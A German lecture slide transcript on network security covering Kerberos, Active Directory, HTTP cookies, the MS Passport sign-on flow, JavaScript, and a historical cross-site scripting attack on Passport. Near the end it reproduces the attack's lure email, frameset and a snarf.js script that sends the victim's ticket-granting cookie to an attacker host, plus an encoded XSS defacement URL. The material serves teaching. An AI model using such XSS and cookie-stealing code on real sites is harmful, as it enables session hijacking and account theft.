Netzsicherheit 5: Identity Management im WWW Microsoft Passport. Prof. Dr. Jörg Schwenk Lehrstuhl für Netz- und Datensicherheit

Größe: px
Ab Seite anzeigen:

Download "Netzsicherheit 5: Identity Management im WWW Microsoft Passport. Prof. Dr. Jörg Schwenk Lehrstuhl für Netz- und Datensicherheit"

Transkript

1 Netzsicherheit 5: Identity Management im WWW Microsoft Passport Prof. Dr.

2 Das Problem: Schlüsselmanagement OHNE Public-Key.Kryptographie Naiver Ansatz: n(n-1) Schlüssel Needham-Schröder/Kerberos: n Schlüssel 2

3 Gliederung 1. Kerberos 2. Kerberos v5 und Microsofts Active Directory 3. HTTP und Cookies 4. MS Passport 5. Javascript 6. XSS-Angriff von Marc Slemko 7. Ausblick: MS Cardspace und SAML 3

4 Kerberos: Direkte Authentifizierung KDC 1 2 Client 3 Server 1. Client KDC: 2. KDC Client: 3. Client Server: In Version 4 lautet die Nachricht 2: 4

5 Kerberos: Direkte Authentifizierung KDC 1 2 Client 3 Server 1. Client KDC: c, s, n 2. KDC Client: 3. Client Server: In Version 4 lautet die Nachricht 2: 5

6 Kerberos: Direkte Authentifizierung KDC 1 2 Client 3 Server 1. Client KDC: c, s, n 2. KDC Client: {K c,s, n}k c, {T c,s }K s 3. Client Server: In Version 4 lautet die Nachricht 2: 6

7 Kerberos: Direkte Authentifizierung KDC 1 2 Client 3 Server 1. Client KDC: c, s, n 2. KDC Client: {K c,s, n}k c, {T c,s }K s 3. Client Server: {A c }K c,s, {T c,s }K s In Version 4 lautet die Nachricht 2: 7

8 Kerberos: Direkte Authentifizierung KDC 1 2 Client 3 Server 1. Client KDC: c, s, n 2. KDC Client: {K c,s, n}k c, {T c,s }K s 3. Client Server: {A c }K c,s, {T c,s }K s In Version 4 lautet die Nachricht 2: {K c,s, n, {T c,s }K s }K c 8

9 Kerberos: Direkte Authentifizierung Quelle: John T. Kohl, B. Clifford Neuman, Theodore Y. Ts o, The Evolution of the Kerberos Authentication Service. Proc EurOpen Conference, Tromsø, Norway. Idee: Generiere ein wieder verwendbares Ticket, um das Key Distribution Center (KDC) zu entlasten. Das Ticket T c,s enthält: ID c K c,s t START, t EXPIRES alles verschlüsselt mit Ks, dem gemeinsamen symmetrischen Schlüssel von KDC und S Achtung: Der Schlüsselserver S aus dem Needham-Schroeder- Prot. heißt jetzt KDC (analog A->C, B->S). 9

10 Kerberos: Direkte Authentifizierung Funktionsweise: In der Grundform analog zu Needham- Schroeder 1. Nachricht: identisch 2. Nachricht: identisch in v4, leicht modifiziert in v5 (bis auf das Ticket-Konzept) 3. Nachricht: neu hinzugekommen ist ein Authentisator, der einen verschlüsselten Zeitstempel enthält Vorteil: Bei wiederholter Authentifizierung von C beim gleichen Server S zwischen t START und t EXPIRES muss nur die Nachricht 3 mit neu generiertem Authentisator gesendet werden. (Entlastung des KDC.) Vorteil gegenüber Zertifikaten: K c kann aus einem Passwort generiert werden (z.b. im Internetcafé) 10

11 Kerberos: Authentifizierung mit TGS KDC TGS Client 5 Server 1. Client KDC: c, tgs, n 2. KDC Client: {K c,tgs, n}k c, {T c,tgs }K tgs 3. Client TGS: {A c } K c,tgs, {T c,tgs }K tgs, s, n 4. TGS Client: 5. Client Server: 11

12 Kerberos: Authentifizierung mit TGS KDC Client 4 TGS 5 Server 1. Client KDC: c, tgs, n 2. KDC Client: {K c,tgs, n}k c, {T c,tgs }K tgs 3. Client TGS: {A c } K c,tgs, {T c,tgs }K tgs, s, n 4. TGS Client: {K c,s, n}k c,tgs, {T c,s }K s 5. Client Server: {A c }K c,s, {T c,s }K s 12

13 Kerberos: Zusätzliches Ticket Ziele: Geheimer gemeinsamer Schlüssel K c zwischen Client und KDC soll besser geschützt werden Authentisierung soll für Nutzer transparent sein Lösung: Einführung eines zusätzlichen Tickets und eines Zwischenschrittes K c wird nur einmal eingesetzt, um ein Ticket Granting Ticket (TGT) zu erhalten, danach wird er gelöscht Für weitere Authentifizierungen wird nur noch der temporäre Schlüssel K c,tgs benötigt Nachrichten 2 und 4 sowie 3 und 5 haben die gleiche Struktur 13

14 Gliederung 1. Kerberos 2. Kerberos v5 und Microsofts Active Directory 3. HTTP und Cookies 4. MS Passport 5. Javascript 6. XSS-Angriff von Marc Slemko 7. Ausblick: MS Cardspace und SAML 14

15 Kerberos v5 und MS Active Directory 15

16 Kerberos v5 und MS Active Directory Domäne Eine Gruppe von Computern, die Teil eines Netzwerkes sind und eine gemeinsame Verzeichnisdatenbank nutzen. Eine Domäne wird als eine Einheit mit gemeinsamen Regeln und Verfahren verwaltet. Jede Domäne hat einen eindeutigen Namen. Eine Active Directory-Domäne ist eine von einem Administrator eines Windows-Netzwerkes definierte Gruppierung von Computern. Diese Computer verwenden mit anderen Domänen eine gemeinsame Verzeichnisdatenbank, gemeinsame Sicherheitsrichtlinien und Sicherheitsbeziehungen. Eine Active Directory-Domäne bietet Zugriff auf die zentralisierten Benutzerkonten und Gruppenkonten, die vom Domänenadministrator verwaltet werden. Eine Active Directory- Gesamtstruktur setzt sich aus einer oder mehreren Domänen zusammen, von denen sich jede über mehr als einen physischen Standort erstrecken kann. Eine DNS-Domäne ist jede Struktur oder Teilstruktur innerhalb des DNS-Namespace. Obwohl die Namen von DNS-Domänen häufig mit denen von Active Directory-Domänen übereinstimmen, dürfen DNS- Domänen nicht mit Active Directory-Domänen verwechselt werden. Siehe auch: Active Directory; DNS (Domain Name System) 16

17 Kerberos v5 und MS Active Directory Active Directory Der Verzeichnisdienst, der Informationen zu Objekten in einem Netzwerk speichert und diese Informationen Benutzern und Netzwerkadministratoren zur Verfügung stellt. Active Directory ermöglicht Netzwerkbenutzern über einen einzigen Anmeldevorgang den Zugriff auf zugelassene Ressourcen im gesamten Netzwerk. Es stellt Netzwerkadministratoren eine anschauliche, hierarchische Ansicht des Netzwerkes und einen einzigen Verwaltungspunkt für alle Netzwerkobjekte zur Verfügung. Schlüsselverteilungscenter (Key Distribution Center, KDC) Ein Netzwerkdienst, der Sitzungstickets und temporäre Sitzungsschlüssel bereitstellt, die im Kerberos V5-Authentifizierungsprotokoll verwendet werden. In Windows 2000 und Windows XP wird das Schlüsselverteilungscenter als privilegierter Prozess auf allen Domänencontrollern ausgeführt. Siehe auch: Kerberos V5-Authentifizierungsprotokoll;... Domänencontroller Ein Computer in einer Windows-Domänenumgebung, auf dem Active Directory ausgeführt wird und der den Benutzerzugriff auf ein Netzwerk verwaltet. Zu seinen Aufgaben zählen die Verwaltung von Anmeldung, Echtheitsbestätigung und Zugriff auf Verzeichnisse und freigegebene Ressourcen. 17

18 Kerberos v5 und MS IPSec 18

19 Kerberos v5 und MS IPSec 19

20 Gliederung 1. Kerberos 2. Kerberos v5 und Microsofts Active Directory 3. HTTP und Cookies 4. MS Passport 5. Javascript 6. XSS-Angriff von Marc Slemko 7. Ausblick: MS Cardspace und SAML 20

21 HTTP und Cookies Architektur des WWW Client-Server-Architektur Statische Webseiten: HTTP-Anfrage (mit URL) Browser HTTP-Anwort (Header+Datei) Web- Server Dateisystem: *.html 21

22 HTTP und Cookies Client (Browser) ist für die Darstellung verantwortlich Das gleiche *.html-dokument kann auf verschiedenen Browsern unterschiedlich aussehen. Darstellung verschiedener Dateitypen durch Browser, Plug-In oder Helper Server sendet im HTTP-Header den MIME-Typ der Datei, die übertragen wird Anhand dieses MIME-Typs kann der Browser entscheiden, wie die Datei dargestellt werden soll: text/plain, text/html: Browser image/jpeg, video/mpeg: Plug-In. Plug-Ins laufen innerhalb des Browsers ab, und haben daher Zugriff auf das aktuelle Fenster. Sie werden nur bei Bedarf geladen. application/pdf, application/msword: Helper-Anwendung. Sie laufen außerhalb des Browsers ab. 22

23 HTTP und Cookies Kommunikation aus Sicht des Browsers 1. User tippt 2. Browser erfragt bei einem Domain Name Server (DNS) die IP- Adresse zu Browser baut eine TCP-Verbindung zu Port 80 auf 4. Browser sendet ein http-kommando über diese TCP- Verbindung: Get schwenk/index.html HTTP/1.0 User-agent: Netscape 4.7 Accept: text/plain Accept: text/html Accept: image/gif 23

24 HTTP und Cookies 5. Server antwortet über die TCP-Verbindung mit: Einer Statuszeile (Erfolgsmeldung oder Fehler) Metainfomation (Beschreibung der nachfolgenden Information) Einer Leerzeile Der Information selbst HTTP/1.0 Status 200 Document follows Server: Apache/1.8 Date: Mon, 14 Mai, :23:22 GMT Content-type: text/html Content-length: 5280 Last-modified: Fri, 11 Mai, :12:12 GMT <html>... </html> 24

25 HTTP und Cookies Schritt 1-5 wird für jede HTTP-Anfrage wiederholt. Insbesondere muß für jede HTTP-Anfrage eine neue TCP- Verbindung aufgebaut werden Verbesserte Performance durch Persistenz der TCP- Verbindung in HTTP

26 HTTP und Cookies Uniform Ressource Locators (URLs) bestehen aus drei Teilen Protokoll (z.b. http) DNS-Name des Servers (z.b. Pfad/Filename (/pub/default.html) Beispiele: Systemsicherheit_7.pdf ftp://ftp.daco.org/scripte/vorlesung.pdf file:///c /FTP/Java_Tutorial/book.html telnet:// Für http-urls gibt es als optionalen Teil den Query-String zur Übertragung von Daten seqnr=4&ident= &rt=1&ok#focus 26

27 HTTP und Cookies HTTP ist ein verbindungsloses Protokoll Verschiedene WWW-Anfragen vom gleichen Client stehen für den Server in keinem Zusammenhang Perfekt geeignet für das ursprüngliche Hypertext-Internet Problematisch für Webshops: Wie merke ich mir, welche Produkte der Kunde beim letzten Besuch in seinen Einkaufswagen gelegt hat? Netscape-Lösung: Cookies ( \netscape\users\user1\cookies.txt) Beim ersten Besuch eines Browsers bei einem Server legt der Server beim Browser einen eindeutigen Wert ab: Ein Cookie ( Plätzchen ) Der Server speichert alle Variablen, die beim ersten Besuch des Kunden gesetzt wurden, in einer Datenbank ab. Referenz auf diesen DB-Eintrag ist das Cookie. Wenn der Client den Server oder die Domain zum zweiten mal besucht, liefert er diesen Cookie mit ab, und der Server weiß wieder, mit wem er redet. 27

28 HTTP und Cookies 28

29 HTTP und Cookies Domain Path Content Expires Secure toms-casino.com / CustomerID= :00 Yes toms-casino.com Cookie wird an alle Server dieser Domain zurück gesendet. (Weitere Einschränkung: Gesetzt werden muss dieses Cookie von einem Server aus dieser Domain.) / Cookie kann für alle Files im WWW-Zweig des Servers verwendet werden CustomerID= Identifiziert einen Besucher des Casinos eindeutig :00 Da dieses Datum in der Vergangenheit liegt, wird das Cookie demnächst vom Browser gelöscht YES Browser darf das Cookie nur an einen sicheren Server zurücksenden 29

30 HTTP und Cookies Domain Path Content Expires Secure joes-store.com / Cart= ; :00 No Cart= ; Die Variable Cart enthält hier den Inhalt des Einkaufswagens, in Form von eindeutigen Produktnummern. Diese Liste wird also im Browser gespeichert, was den Server entlastet. Genug Platz ist dafür da, da ein Cookie bis zu 4 KB groß werden darf. No Browser darf das Cookie an jeden Server zurücksenden 30

31 HTTP und Cookies Domain Path Content Expires Secure aportal.com / Prefs=Stk:SUNW;Spt:1860M :00 No Prefs=Stk:SUNW;Spt:1860M Die Variable Prefs speichert die Präferenzen eines Kunden für ein bestimmtes Internet- Portal. Mit der genannten Festlegung werden dem Kunden immer die Börsenwerte der Firma SUN und die Ergebnisse der Fußballspiele von 1860 München angezeigt. 31

32 HTTP und Cookies Domain Path Content Expires Secure sneaky.com / UserID= :59 No UserID= Die Variable UserID wird von der Firma Sneaky dazu verwendet, Daten über den Kunden zu sammeln. Dies kann z.b. dadurch geschehen, dass ein Werbebanner (.doubleclick.net) auf vielen Seiten im Internet platziert wird. Dieses Werbebanner muss jeweils von einem Server aus der Domain sneaky.com abgerufen werden, und so wird das Cookie regelmäßig an die Firma gesendet. Diese kann sehen, von welcher Webseite aus das Banner aufgerufen wurde, und so ein Nutzerprofil erstellen. (Im Extremfall reicht dazu eine Banner, das 1*1 Pixel groß ist!) 32

33 HTML-Formulare <html> <head> <title> Anmeldeformular Prüfungen </title> </head> <body> <h1> Anmeldeformular Prüfungen </h1> <form ACTION=" method=post> <p> Name <input name="student" size=46> </p> <p> <input name=" " size=30> </p> <p> Matrikelnummer <input name="matrnr" size=20> Studienbeginn (Jahr) <input name="beginn" size=4> Master <input name="studiengang" type=radio value="master"> Diplom <input name="studiengang" type=radio value="diplom"> </p> <p> Systemsicherheit <input name="pruefung1" type=checkbox> </p> <p> Netzsicherheit <input name="pruefung2" type=checkbox> </p> <p><input type=submit value="anmelden!!"> </p> Viel Erfolg! </form> </body> </html> 33

34 HTML- Formulare 34

35 HTML-Formulare GET-Methode Eingaben werden als Query-String an die URL angehängt Beispiel (Google): GET /search?q=diploma+supplement&ie=iso &hl=de&btng=google+suche&meta=cr%3dcountryde Vorteil: Anfrage kann als Bookmark gespeichert werden Problem: Bei Eingabe von Username/Passwort ist das Passwort in der History des Browsers sichtbar POST-Methode Eingaben werden als String im Body des http-requests an den Server übertragen Beispiel (zu Tanenbaum): customer=joerg+schwenk&address=universitaetsstr+150&city=bochum& state=nrw&country=de&cardno= &expires=7/07& cc=mastercard&product=cheap&express=on 35

36 HTML: Versteckte Formularfelder HTML-Formulare können versteckt werden ( type=hidden ), dann werden sie nicht angezeigt HTML-Formulare können mit Default-Werten vorbelegt werden Das Senden der Daten kann per Javascript erfolgen, und Javascript wird über ein Browser-Event aktiviert, z.b. durch onload 36

37 HTTP Redirection HTTP 1.1, spezifiziert in RFC 2616, beschreibt Redirection wie folgt: 10.3 Redirection 3xx This class of status code indicates that further action needs to be taken by the user agent in order to fulfill the request. The action required MAY be carried out by the user agent without interaction with the user if and only if the method used in the second request is GET or HEAD. A client SHOULD detect infinite redirection loops, since such loops generate network traffic for each redirection. 300 Multiple Choices 301 Moved Permanently 303 See Other 37

38 Gliederung 1. Kerberos 2. Kerberos v5 und Microsofts Active Directory 3. HTTP und Cookies 4. MS Passport 5. Javascript 6. XSS-Angriff von Marc Slemko 7. Ausblick: MS Cardspace und SAML 38

39 MS Passport: Wozu? 39

40 How does MS Passport work? The user from out of CERN wants to access a protected page/service User CERN Web Server [WEBx, WEBAxx] The user s request is redirected to the Passport sign-in page (and it pass the Site ID, Its public key and the return URL on the query string) Login Form Userid ( address) and password(using SSL) The login server checks the Site ID and return URL. They must match a server registration in the login server Quelle: Dmitry Nikitov & Sébastien Delmas, Should We Use MS.NET Passport for User Authentication? CERN, Information Technology Division, Internet Services Group, August 4th,

41 How does MS Passport work? User CERN Web Server [WEBx, WEBAxx] Quelle: Dmitry Nikitov & Sébastien Delmas, Should We Use MS.NET Passport for User Authentication? CERN, Information Technology Division, Internet Services Group, August 4th,

42 How does MS Passport work? The user from out of CERN wants to access a protected page/service User CERN Web Server [WEBx, WEBAxx] Quelle: Dmitry Nikitov & Sébastien Delmas, Should We Use MS.NET Passport for User Authentication? CERN, Information Technology Division, Internet Services Group, August 4th,

43 How does MS Passport work? The user from out of CERN wants to access a protected page/service User CERN Web Server [WEBx, WEBAxx] The user s request is redirected to the Passport sign-in page (and it pass the Site ID, Its public key and the return URL on the query string) Quelle: Dmitry Nikitov & Sébastien Delmas, Should We Use MS.NET Passport for User Authentication? CERN, Information Technology Division, Internet Services Group, August 4th,

44 How does MS Passport work? The user from out of CERN wants to access a protected page/service User CERN Web Server [WEBx, WEBAxx] The user s request is redirected to the Passport sign-in page (and it pass the Site ID, Its public key and the return URL on the query string) Quelle: Dmitry Nikitov & Sébastien Delmas, Should We Use MS.NET Passport for User Authentication? CERN, Information Technology Division, Internet Services Group, August 4th,

45 How does MS Passport work? The user from out of CERN wants to access a protected page/service User CERN Web Server [WEBx, WEBAxx] The user s request is redirected to the Passport sign-in page (and it pass the Site ID, Its public key and the return URL on the query string) The login server checks the Site ID and return URL. They must match a server registration in the login server Quelle: Dmitry Nikitov & Sébastien Delmas, Should We Use MS.NET Passport for User Authentication? CERN, Information Technology Division, Internet Services Group, August 4th,

46 How does MS Passport work? The user from out of CERN wants to access a protected page/service User CERN Web Server [WEBx, WEBAxx] The user s request is redirected to the Passport sign-in page (and it pass the Site ID, Its public key and the return URL on the query string) Login Form The login server checks the Site ID and return URL. They must match a server registration in the login server Quelle: Dmitry Nikitov & Sébastien Delmas, Should We Use MS.NET Passport for User Authentication? CERN, Information Technology Division, Internet Services Group, August 4th,

47 How does MS Passport work? The user from out of CERN wants to access a protected page/service User CERN Web Server [WEBx, WEBAxx] The user s request is redirected to the Passport sign-in page (and it pass the Site ID, Its public key and the return URL on the query string) Login Form The login server checks the Site ID and return URL. They must match a server registration in the login server Quelle: Dmitry Nikitov & Sébastien Delmas, Should We Use MS.NET Passport for User Authentication? CERN, Information Technology Division, Internet Services Group, August 4th,

48 How does MS Passport work? The user from out of CERN wants to access a protected page/service User CERN Web Server [WEBx, WEBAxx] The user s request is redirected to the Passport sign-in page (and it pass the Site ID, Its public key and the return URL on the query string) Login Form Userid ( address) and password(using SSL) The login server checks the Site ID and return URL. They must match a server registration in the login server Quelle: Dmitry Nikitov & Sébastien Delmas, Should We Use MS.NET Passport for User Authentication? CERN, Information Technology Division, Internet Services Group, August 4th,

49 How does MS Passport work? The user from out of CERN wants to access a protected page/service User CERN Web Server [WEBx, WEBAxx] The user s request is redirected to the Passport sign-in page (and it pass the Site ID, Its public key and the return URL on the query string) Login Form Userid ( address) and password(using SSL) The login server checks the Site ID and return URL. They must match a server registration in the login server Quelle: Dmitry Nikitov & Sébastien Delmas, Should We Use MS.NET Passport for User Authentication? CERN, Information Technology Division, Internet Services Group, August 4th,

50 MS Passport: Technologien Kerberos Ist die Basis von MS Passport, Nachrichten werden durch Cookies, HTML-Formulare oder Query-Strings in URLs abgebildet. Cookies Die einzigen Nachrichten, die in HTTP persistent gespeichert werden, sind Cookies. Query String Datenteil der URL HTML-Formulare Vorbelegte Daten werden mit GET oder POST übertragen. HTTP Redirection Transparente Umleitung des Nutzer auf den MS Passport-Server. Der Kunde merkt davon (fast) nichts, es erscheint fast der gleiche Dialog wie beim Login auf einem Webserver. 50

51 MS Passport: Erstes Sign-In Passport Login Server 2 Client 1 bank.de Schritt 1 Request HTTP GET auf geschützte Seite (keine Cookies) Response 2 51

52 MS Passport: Erstes Sign-In Passport Login Server 2 Client 1 bank.de Schritt 1 2 Request HTTP GET auf geschützte Seite (keine Cookies) HTTP GET auf PP Login Server (bank.de-infos im QS) Response 303 HTTP Redirect zum Passport Login Server (bank.de ID, ReturnURL, TimeWindow,... im Query String (QS) der URL) 52

53 MS Passport: Erstes Sign-In Passport Login Server 2 Client 1 bank.de Schritt 1 2 Request HTTP GET auf geschützte Seite (keine Cookies) HTTP GET auf PP Login Server (bank.de-infos im QS) Response 303 HTTP Redirect zum Passport Login Server (bank.de ID, ReturnURL, TimeWindow,... im Query String (QS) der URL) 200 OK, Sign In Form 53

54 MS Passport: Erstes Sign-In Passport Login Server 3 Client bank.de Schritt 3 Request HTTPS POST auf PP Login Server (enthält Username / Passwort) Response 54

55 MS Passport: Erstes Sign-In Passport Login Server 3 Client bank.de Schritt Request Response 3 HTTPS POST auf PP Login Server (enthält Username / Passwort) 303 HTTP Redirect zurück zu bank.de, falls Authentifizierung positiv. Übergibt folgende Werte (als Cookie, Query-String oder als Formularfeld): Ticket granting cookie (verschl. mit central key ) Ticket cookie (verschl. mit bank.de-schlüssel) Profile cookie (verschl. mit bank.de-schlüssel) 55

56 MS Passport: Erstes Sign-In Passport Login Server Client 4 bank.de Schritt 4 Request HTTP GET auf geschützte Seite (sendet Ticket Cookie und Profile Cookie für bank.de als Webobjekt) Response 56

57 MS Passport: Erstes Sign-In Passport Login Server Client 4 bank.de Schritt Request Response 4 HTTP GET auf geschützte Seite (sendet Ticket Cookie und Profile Cookie für bank.de im http-header) Passport Manager Software entschlüsselt Ticket cookie und Profile cookie (verschl. mit bank.de-schlüssel), 200 OK mit Inhalt der aufgerufenen Webseite schreibt Site-Cookie (wichtig für Logout)) und setzt die anderen Cookies (Persistenz!) 57

58 MS Passport: Weiteres Sign-In Passport Login Server 2 Client 1 auto.de Schritt 1 2 Request HTTP GET auf geschützte Seite (keine spez. Cookies) HTTP GET auf PP Login Server (auto.de-infos im QS); sendet Ticket granting cookie Response 303 HTTP Redirect zum Passport Login Server (auto.de ID, ReturnURL, TimeWindow,... im QS) 303 HTTP Redirekt zu auto.de (mit ticket und profile cookies, verschlüsselt mit auto.de- Schlüssel) 58

59 MS Passport: Weiteres Sign-In Passport Login Server Client 3 auto.de Schritt 3 Request HTTP GET auf geschützte Seite (sendet Ticket Cookie und Profile Cookie für auto.de im QS) Response Passport Manager Software entschlüsselt Ticket cookie und Profile cookie (verschl. mit auto.de-schlüssel), 200 OK mit Inhalt der aufgerufenen Webseite. schreibt weiteres Site-Cookie (wichtig für Logout) 59

60 MS Passport: Veraltetes Cookie Passport Login Server 2 Client 1 bank.de Schritt 1 2 Request HTTP GET auf geschützte Seite (mit Auth und Profile Cookies) HTTP GET auf PP Login Server (mit Auth und Profile Cookies für bank.de) Response 303 HTTP Redirect zum Passport Login Server (Ticket liegt nicht mehr im bank.de-zeitfenster) 303 HTTP Redirekt zu PP Login Server (Ticket Cookie muss mit Ticket Granting Cookie aufgefrischt werden) 60

61 MS Passport: Veraltetes Cookie Passport Login Server 3 Client 4 bank.de Schritt 3 4 Request HTTPS POST auf PP Login S. (mit Ticket Granting Cookie) HTTP GET auf bank.de (mit Cookies für bank.de) Response 303 HTTP Redirect zu bank.de (Setzt passport.com Cookies, neue bank.de- Cookies verschlüsselt im QS) 200 OK mit Inhalt der aufgerufenen Webseite 61

62 MS Passport: Single Sign-Out Beim Sign-Out werden alle Cookies für alle Sites ungültig MS PP-Server muss dies den Partnersites mitteilen. 62

63 Gliederung 1. Kerberos 2. Kerberos v5 und Microsofts Active Directory 3. HTTP und Cookies 4. MS Passport 5. Javascript 6. XSS-Angriff von Marc Slemko 7. Ausblick: MS Cardspace und SAML 63

64 XSS mit iframe

65 XSS mit iframe backgroundcolor:white;width:95%;%3e %3c/div%3e%3cdiv%3e%3ch2%3ebundesinnen minister%20tritt%20zur%fcck%3c/h2%3e%3cp%3ew%e4re%20eine%20meldung,%20 die%20sicher%20viele%20gerne%20lesen%20w%fcrden.%20allerdings%20handelt%20e s%20sich%20nur%20um%20eine%20cross-site-scripting- Schwachstelle%20im%20der%20Webseite%20des%20Politikers,%20der%20gerne%20die %20Online- Durchsuchung%20einf%FChren%20m%F6chte.%20Scherzbolde%20k%F6nnen%20dadurc h%20beliebige%20meldungen%20unter%20der%20dom%e4ne%20wolfgangschaeuble.de%20erstellen.%3c/p%3e%3cp%3eder%20fehler%20liegt%20in%20der%20 Suchfunktion%20des%20Internetauftritts,%20die%20HTML- %20und%20Skriptcode%20in%20Anfragen%20nicht%20ausfiltert.%20Gr%FC%DFe%20a n%20dmk.%3c/p%3e%3c/div%3e%3cdiv%20style=display:none%3e%3cstrong%3e&i d=38&no_cache=1 Quelle:

66 Beispiel: Cross-Site-Scripting Beispiel ebay Phisher erstellt Angebot Bettet im Angebot bösartigen Code ein Code kompromittiert Bieten- Button Benutzer wird zur Eingabe seiner Zugangsdaten aufgefordert, wobei diese Seite vom Angreifer stammt Benutzer gibt seine Zugangsdaten preis Quelle: 66

67 Einbettung <SCRIPT Language=JavaScript> breite = 35; function f(text) { document.writeln(text); } </SCRIPT> <FORM> <INPUT Type=text Size=&{breite};><BR> <INPUT Type=button onclick="confirm('ok drücken!')" Value=&{s=0; for(i=1; i<=5000; i++) s+=i;};> </FORM> <HR Align=left Width=&{10*breite;};> <A Href="javascript:alert('Hallo!')">Sag Hallo</A> Markup Entity Attribut Entity Entity URL 67

68 Einbettung 68

69 Browsermodell Javascript manipuliert seine/ihre Umgebung mit Hilfe von vordefinierten Objekten Das rechte Bild zeigt den Anfang dieser Objekthierarchie Objektreferenzen: Selfhtml Unterschiede bei NS und IE W3C standardisiert DOM Quelle: www20.pair.com/doozer/gu ides/ javascript/js_014.html 69

70 Browsermodell Window: das aktuellefenster parent: das übergeordnete Fenster eines Frameset; muss ein Frameset sein top: die Wurzel des Fensterbaumes eines Frameset; bei nur einem Frame das Fenster selbst self: identisch mit window frames[i]: i-ter Frame eines Frameset 70

71 Browsermodell history: die Browser- Historie der zuvor besuchten Seiten (wichtig für Forward/Back) location: die URL, ggf. einschließlich des Query- Strings document: das HTML- Dokument title: Titel des Dokuments anchors[i]: i-ter Anker forms[i]: i-tes Formular links[i]: i-ter Hyperlink 71

72 5. Browsermodell Beispiel window-methoden: alert(), confirm(), prompt() <SCRIPT Language=JavaScript> alert("alarmfenster"); l = confirm("bestätigungsfenster"); document.writeln(l); x = prompt("eingabefenster", "Nein"); document.writeln(x); </SCRIPT> 72

73 5. Browsermodell Beispiel window-methoden: open(), close() <FORM> <INPUT Type=button Value="Öffne Fenster" onclick=oeffne()> </FORM> <SCRIPT Language=JavaScript> function oeffne() { var attr = "resizable=yes,width=300,height=200"; var x = window.open(null, null, attr); // leeres Fenster öffnen x.document.open(); x.document.write("<h4 Align=center>Titel</H4>\n"); x.document.write("<form><input Type=button Value=CloseIT"); x.document.write( " onclick=window.close()></form>\n"); x.document.close();} </SCRIPT> 73

74 5. Browsermodell Beispiel Frames: setinterval() <FRAMESET Cols="250,*" Border=4> <FRAME Name=links Src=links.html> <FRAME Name=rechts Src=empty.html> </FRAMESET> <!--./frames/empty.html --> <BODY Bgcolor=white> 74

75 5. Browsermodell Beispiel Frames <!--./frames/links.html --> <FORM> <INPUT Type=text Name=end Value=1> <INPUT Type=text Name=tor Value=1> <INPUT Type=button Name=los Value=Loos! onclick=rechne(this)> </FORM><PRE> <SCRIPT Language=JavaScript> function rechne(t) { var a = parsefloat(t.form.end.value) var b = parsefloat(t.form.tor.value); with (parent.rechts.document) { open(); writeln("a = " + a + "<BR>b = " + b); writeln("<br>summe = " + (a + b)); close();} } </SCRIPT> 75

76 5. Browsermodell Beispiel Formulare <FORM Name=meinformular Method=GET Action=eins.html> <INPUT Type=button Name=knopf Value=Knopf> <INPUT Type=text Name=text Value=42> <SELECT Name=wahl> <OPTION>eins <OPTION>zwei</SELECT> <INPUT Type=submit Name=submit Value=Los> </FORM> <SCRIPT Language=JavaScript> document.meinformular.onsubmit = function() { return confirm("wirklich losschicken?"); } </SCRIPT> 76

77 Gliederung 1. Kerberos 2. Kerberos v5 und Microsofts Active Directory 3. HTTP und Cookies 4. MS Passport 5. Javascript 6. XSS-Angriff von Marc Slemko 7. Ausblick: MS Cardspace und SAML 77

78 MS Passport: CSS-Angriff von Marc Slemko CSS: Cross-Site Scripting Quelle: Microsoft Passport to Trouble Marc Slemko Last Modified: $Date: 2001/11/05 03:03:39 $ $Revision: 1.18 $ 78

79 MS Passport: CSS-Angriff von Marc Slemko Schritt 1: Senden einer and die Hotmail-Adresse des Opfers. From: Jennifer Sparks To: Content-type: text/html Subject: Jack said I should you... Hi Ted. Jack said we would really hit it off. Maybe we can get together for drinks sometime. Maybe this friday? Let me know. <BR> <BR> <HR> You can see the below for demonstration purposes. In a real exploit, you wouldn't even see it happening. <HR> <BR> <_img foo="<iframe width='80%' height='400' src=' /IFRAME>" > 79

80 MS Passport: CSS-Angriff von Marc Slemko Schritt 1: Senden einer and die Hotmail-Adresse des Opfers. alive.znep.com hotmail.com passport.com 80

81 MS Passport: CSS-Angriff von Marc Slemko Schritt 2: Einloggen des Opfers bei Hotmail. alive.znep.com hotmail.com opfer@hotmail.com 4: Ticket granting Cookie für passport.com passport.com/ppsecure 81

82 MS Passport: CSS-Angriff von Marc Slemko Schritt 3: Öffnen der und Laden des IFrame mit der Datei grabit.html. <HTML><HEAD><TITLE>Wheeeee</TITLE> <frameset rows="200,200"> <FRAME NAME="me1" SRC=" <FRAME NAME="me2" SRC=" ru= src=' %3Ej%3C/SCRIPT%3E%3Flc%3D1033"> </FRAMESET> </HTML> 82

83 MS Passport: CSS-Angriff von Marc Slemko Schritt 3: Öffnen der und Laden des IFrame mit der Datei grabit.html. alive.znep.com 2: Laden von grabit.html 1: Laden der hotmail.com passport.com 83

84 MS Passport: CSS-Angriff von Marc Slemko Schritt 3: Öffnen der und Laden des IFrame mit der Datei grabit.html alive.znep.com From: Jennifer Sparks <xxx@xxx.xxxx> Hi Ted.. grabit.html hotmail.com opfer@hotmail.com passport.com 84

85 MS Passport: CSS-Angriff von Marc Slemko Schritt 4: Laden von ppsecure/404please und snarf.js. <HTML><HEAD><TITLE>Wheeeee</TITLE> <frameset rows="200,200"> <FRAME NAME="me1" SRC=" <FRAME NAME="me2" SRC=" ru= src=' %3Ej%3C/SCRIPT%3E%3Flc%3D1033"> </FRAMESET> </HTML> 85

86 MS Passport: CSS-Angriff von Marc Slemko Schritt 4: Laden von ppsecure/404please und snarf.js. 2 5 alive.znep.com From: Jennifer Sparks <xxx@xxx.xxxx> Hi Ted.. grabit.html ppsecure/404please register.passport.com/reg.srf snarf.js 1 hotmail.com 3 4 opfer@hotmail.com passport.com 86

87 MS Passport: CSS-Angriff von Marc Slemko Schritt 5: Ausführen von snarf.js und Stehlen des Ticket Granting cookie. s = new String(document.URL); if (s.indexof(' == 0) { } else { } settimeout('document.location=" + s.substring(5, s.length-1, 1000)'); document.location=" passport/snarf.cgi?cookies=" + escape(parent.frames[0].document.cookie); 87

88 MS Passport: CSS-Angriff von Marc Slemko Schritt 5: Ausführen von snarf.js und Stehlen des Ticket Granting cookie. From: Jennifer Sparks alive.znep.com Ticket granting Cookie Hi Ted.. grabit.html ppsecure/404please register.passport.com/reg.srf snarf.js hotmail.com passport.com 88

89 Gliederung 1. Kerberos 2. Kerberos v5 und Microsofts Active Directory 3. HTTP und Cookies 4. MS Passport 5. Javascript 6. XSS-Angriff von Marc Slemko 7. Ausblick: MS Cardspace und SAML 89

90 Ausblick MS Cardspace ist der Nachfolger von MS Passport Identitäten und Geheimnisse werden als Karten verwaltet 90

